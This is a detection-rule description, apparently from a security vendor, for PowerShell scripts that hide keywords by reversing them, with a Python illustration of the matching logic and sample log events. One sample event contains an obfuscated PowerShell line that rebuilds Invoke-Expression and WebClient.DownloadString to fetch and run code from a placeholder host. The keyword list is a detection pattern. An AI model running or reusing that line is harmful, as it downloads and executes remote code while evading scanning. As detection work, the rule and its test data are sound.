
Summary
This detection rule identifies PowerShell scripts that obfuscate strings by reversing them, a tactic attackers use to defeat static analysis and keyword-based controls such as the Antimalware Scan Interface (AMSI). The rule runs over the PowerShell operational log and targets the event code associated with script block logging (event ID 4104), so it inspects script content as PowerShell records it. Using the ES|QL MATCH operator, it searches the logged script block text for the reversed forms of keywords that commonly indicate malicious behavior. It counts the matches per script block and raises an alert when the count exceeds a defined threshold, highlighting an obfuscation technique typical of threat actors.
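The following is an added illustration of the detection logic described above, written here as a standalone Python script rather than taken from the rule itself (the rule's own query is ES|QL and is not reproduced on this page). The keyword list, the threshold of 2, the field name powershell.file.script_block_text, the host names and the four log events are all constructed assumptions for the example, not the rule's actual values; the PowerShell snippet in the second event shows one common way attackers reverse a string at run time (indexing from -1 down to the negative length and joining the characters).

```python
"""Toy re-implementation of a reversed-keyword detection over PowerShell
script block logging (event ID 4104). Constructed example; the keyword
list, threshold, field names and sample events are assumptions, not the
rule's own.
"""
import re

# Assumed keyword list: strings an attacker would reverse so that a
# scanner looking for the forward form misses them. The real rule's
# list is not reproduced on the page this example accompanies.
KEYWORDS = [
    "Invoke-Expression",
    "DownloadString",
    "FromBase64String",
    "New-Object",
    "Start-Process",
    "Net.WebClient",
]


def reversed_keyword_pattern(keywords):
    """Build one case-insensitive regex matching the reversed form of each keyword.

    "Invoke-Expression"[::-1] is "noisserpxE-ekovnI"; re.escape keeps the
    dot in "Net.WebClient" literal.
    """
    return re.compile("|".join(re.escape(k[::-1]) for k in keywords), re.IGNORECASE)


REVERSED = reversed_keyword_pattern(KEYWORDS)


def count_reversed_keywords(script_block_text):
    """Count every occurrence of a reversed keyword in one script block."""
    return len(REVERSED.findall(script_block_text))


def evaluate(events, threshold=2):
    """Mimic the rule: keep only 4104 events, count hits, alert when hits exceed the threshold."""
    alerts = []
    for ev in events:
        if ev.get("event.code") != "4104":
            continue  # module logging (4103) and others are out of scope
        hits = count_reversed_keywords(ev.get("powershell.file.script_block_text", ""))
        if hits > threshold:
            alerts.append({"host": ev["host.name"], "hits": hits})
    return alerts


# Constructed sample events (assumed field names; not real log data).
SAMPLE_EVENTS = [
    {   # benign administration, no reversed keywords
        "event.code": "4104", "host.name": "WS-017",
        "powershell.file.script_block_text":
            "Get-ChildItem C:\\Users | Sort-Object Length -Descending",
    },
    {   # three reversed keywords rebuilt at run time, then invoked
        "event.code": "4104", "host.name": "WS-042",
        "powershell.file.script_block_text": (
            "$r = 'gnirtSdaolnwoD'; $c = 'tneilCbeW.teN'; $x = 'noisserpxE-ekovnI'\n"
            "$f = { param($s) -join $s[-1..-($s.Length)] }\n"
            "& (& $f $x) ((New-Object (& $f $c)).(& $f $r)('http://example.invalid/p'))"
        ),
    },
    {   # same content but module logging, so the rule ignores it
        "event.code": "4103", "host.name": "WS-042",
        "powershell.file.script_block_text": "$x = 'noisserpxE-ekovnI'; $c = 'tneilCbeW.teN'",
    },
    {   # a single reversed keyword: below the threshold, no alert
        "event.code": "4104", "host.name": "WS-099",
        "powershell.file.script_block_text": "$a = 'tcejbO-weN'",
    },
]

if __name__ == "__main__":
    for alert in evaluate(SAMPLE_EVENTS):
        print(f"ALERT host={alert['host']} reversed_keyword_hits={alert['hits']}")
```

Only the second event fires: it carries three reversed keywords in one script block, which exceeds the assumed threshold of 2, while the 4103 event is filtered out by the event code check and the single-keyword block stays under the threshold. Counting per block rather than alerting on any single hit is what keeps occasional reversed fragments in legitimate scripts from paging an analyst.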
Categories
- Endpoint
Data Sources
- Windows Registry
- Application Log
- Process
ATT&CK Techniques
- T1027
- T1140
- T1059
- T1059.001
Created: 2025-04-14